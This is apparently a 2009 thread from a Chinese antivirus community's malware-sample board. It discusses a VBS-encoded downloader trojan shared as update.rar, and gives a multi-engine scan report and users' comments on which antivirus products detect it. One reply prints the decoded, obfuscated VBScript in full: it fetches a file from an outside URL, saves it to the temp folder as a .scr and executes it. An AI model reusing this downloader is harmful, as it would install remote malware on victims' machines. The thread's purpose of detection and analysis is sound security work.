查看: 4192|回复: 13
收起左侧

[病毒样本] 试试这个

[复制链接]
lf968
发表于 2009-11-28 13:00:43 | 显示全部楼层 |阅读模式
VirSCAN.org Scanned Report :
Scanned time   : 2009/11/28 12:39:40 (CST)
Scanner results: 19%的杀软(7/37)报告发现病毒
File Name      : update.rar
File Size      : 1033 byte
File Type      : RAR archive data, v1d, os
MD5            : d485eab297652ee85cab0ca160401eaf
SHA1           : 20b6e4e156399e9f33c1bca8f5168ab5c8f03e9a
Online report  : http://virscan.org/report/c2f628be0281f278dadba9909202c062.html

Scanner        Engine Ver      Sig Ver           Sig Date    Time   Scan result
a-squared      4.5.0.8         20091128050151    2009-11-28  4.01   -
安博士V3       2009.11.27.01   2009.11.27        2009-11-27  0.99   -
AntiVir        8.2.1.78        7.10.1.117        2009-11-27  0.50   HTML/Rce.Gen
安天           2.0.18          20091127.3320938  2009-11-27  0.12   -
Arcavir        2009            200911271246      2009-11-27  0.02   -
Authentium     5.1.1           200911271611      2009-11-27  1.21   VBS/Psyme.IM (Exact)
AVAST!         4.7.4           091127-1          2009-11-27  0.00   -
AVG            8.5.288         270.14.85/2531    2009-11-28  0.31   -
BitDefender    7.81008.4653655 7.29174           2009-11-28  4.00   -
CA (VET)       35.1.0          7145              2009-11-26  4.24   -
ClamAV         0.95.2          10088             2009-11-27  0.01   -
Comodo         3.12            3063              2009-11-28  0.73   -
CP Secure      1.3.0.5         2009.11.28        2009-11-28  0.03   -
Dr.Web         4.44.0.9170     2009.11.28        2009-11-28  7.21   -
F-Prot         4.4.4.56        20091127          2009-11-27  1.20   VBS/Psyme.IM (exact, not disinfectable)
F-Secure       7.02.73807      2009.11.27.03     2009-11-27  0.11   -
飞塔           11.103-         11.103            2009-11-27  1.01   -
GData          19.9040/19.591  20091128          2009-11-28  6.56   -
ViRobot        20091128        2009.11.28        2009-11-28  0.41   -
Ikarus         T3.1.01.74      2009.11.27.74607  2009-11-27  4.09   -
江民杀毒       11.0.800        2009.11.27        2009-11-27  8.26   -
卡巴斯基       5.5.10          2009.11.28        2009-11-28  0.04   -
金山毒霸       2009.2.5.15     2009.11.27.19     2009-11-27  0.74   -
迈克菲         5.3.00          5815              2009-11-27  3.36   -
Microsoft      1.5302          2009.11.28        2009-11-28  6.38   TrojanDownloader:HTML/Adodb.gen!A
Norman         6.01.09         6.01.00           2009-11-27  4.01   VBS/Psyme.BM
熊猫卫士       9.05.01         2009.11.27        2009-11-27  2.20   -
趋势科技       9.000-1003      6.658.01          2009-11-28  0.02   -
Quick Heal     10.00           2009.11.27        2009-11-27  1.54   -
瑞星           20.0            22.23.05.01       2009-11-28  0.42   Trojan.DL.VBS.Agent.cgk
Sophos         3.01.0          4.47              2009-11-28  3.06   -
Sunbelt        5518            5518              2009-11-18  2.34   -
赛门铁克       1.3.0.24        20091127.003      2009-11-27  0.06   -
nProtect       20091127.01     6396533           2009-11-27  3.62   -
The Hacker     6.5.0.2         v00080            2009-11-27  0.66   -
VBA32          3.12.12.0       20091127.2029     2009-11-27  2.15   -
VirusBuster    4.5.11.10       10.114.2/2016093  2009-11-28  2.38   HTML.Psyme.Gen

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
山林野士
发表于 2009-11-28 13:02:29 | 显示全部楼层
过了微点杀毒,已上报
失落的手链
发表于 2009-11-28 13:39:55 | 显示全部楼层
瑞星2010
Trojan.DL.VBS.Agent.cgk
62590423
发表于 2009-11-28 13:43:04 | 显示全部楼层
to kl mp
zdlzp
发表于 2009-11-28 18:10:59 | 显示全部楼层
监控杀

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
王子带着刀
发表于 2009-11-28 18:31:05 | 显示全部楼层
过NOD2.7
cmkjs
发表于 2009-11-28 18:31:57 | 显示全部楼层
类别: 特洛伊木马下载程序

说明: 这个程序很危险,它下载其他程序。

建议: 立即删除这个软件。

Microsoft Security Essentials 检测到可能会侵害您的隐私或损坏计算机的程序。即使不删除这些程序,仍然可以访问它们所使用的文件(不推荐)。若要访问这些文件,请选择“允许”操作,并单击“应用操作”。如果此选项不可用,请以管理员身份登录或请求本地管理员提供帮助。

项目:
containerfile:C:\Users\zhaohaili\Desktop\update.rar
file:C:\Users\zhaohaili\Desktop\update.rar->update.vbe->(EncScript)
filelocalcopy:C:\ProgramData\Microsoft\Microsoft Antimalware\LocalCopy\{123C8102-DD51-4AB1-B9D5-8C8903CB8C08}-update.rar
webfile:C:\ProgramData\Microsoft\Microsoft Antimalware\LocalCopy\{123C8102-DD51-4AB1-B9D5-8C8903CB8C08}-update.rar|http://bbs.kafan.cn/attachment.p ... e2&t=1259404280
webfile:C:\Users\zhaohaili\Desktop\update.rar|http://bbs.kafan.cn/attachment.p ... e2&t=1259404280

联机获取有关此项目的详细信息。
我爱小洁
头像被屏蔽
发表于 2009-11-28 18:46:21 | 显示全部楼层
过NOD32
MSE杀之!
zzhao
发表于 2009-11-28 19:04:11 | 显示全部楼层
avira直接拦截啊
qianwenxiang
发表于 2009-11-28 19:58:16 | 显示全部楼层
下载: http://ttt20091124.info/oko/tomato_guy_12.html



  1. UIgKqITLA  = "http://ttt20091124.info/oko/tomato_guy_12.html"
  2. FkaNzjGGjjQ = "~wrf0409.scr"

  3. MkajIGqKLag = "i"
  4. QkzMaiyWka = "Scr"
  5. MaZjaKgaQ = QkzMaiyWka + MkajIGqKLag + "pt" + MkajIGqKLag + "ng.F" + MkajIGqKLag + "leSystemObject"

  6. Set OkIIuqMgha = CreateObject(MaZjaKgaQ)
  7. TmPaKQG = OkIIuqMgha.GetSpecialFolder(2)
  8. OuTzIflqT = OkIIuqMgha.BuildPath(TmPaKQG, FkaNzjGGjjQ)

  9. LzUakGFaKq = "M"
  10. ZaLitmQWka = LzUakGFaKq + "S" + "X" + LzUakGFaKq + "L2" + ".X" + LzUakGFaKq + "LHT" + "TP"
  11. Set QmaKgIqaJgfa = CreateObject(ZaLitmQWka)
  12. ZkAlgAiqMgf = "G" + "ET"
  13. QmaKgIqaJgfa.Open ZkAlgAiqMgf, UIgKqITLA, 0
  14. QmaKgIqaJgfa.Send

  15. PoumAjtkq = "OD"
  16. ImzkFiqK = "B.St"
  17. SkgmziTYk = "AD"
  18. ZlmaiyQkam = "re" + "am"
  19. RvnmuiKa = SkgmziTYk + PoumAjtkq + ImzkFiqK + ZlmaiyQkam

  20. Set OkujAm = CreateObject(RvnmuiKa)
  21. OkujAm.Type = 1
  22. OkujAm.Mode = 3
  23. OkujAm.Open
  24. OkujAm.Write QmaKgIqaJgfa.responseBody

  25. OkujAm.SaveToFile OuTzIflqT, 2

  26. QkamYizJek = "l"
  27. IakMgjwOyj = "i"
  28. SSzKgYYanGGa = "She" + QkamYizJek + QkamYizJek + ".App" + QkamYizJek + IakMgjwOyj + "cat" + IakMgjwOyj + "on"
  29. Set OShLeeAigQ = CreateObject(SSzKgYYanGGa)
  30. OShLeeAigQ.ShellExecute OuTzIflqT, "" , "", "", 1
复制代码
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-4-19 23:19 , Processed in 0.078686 second(s), 2 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表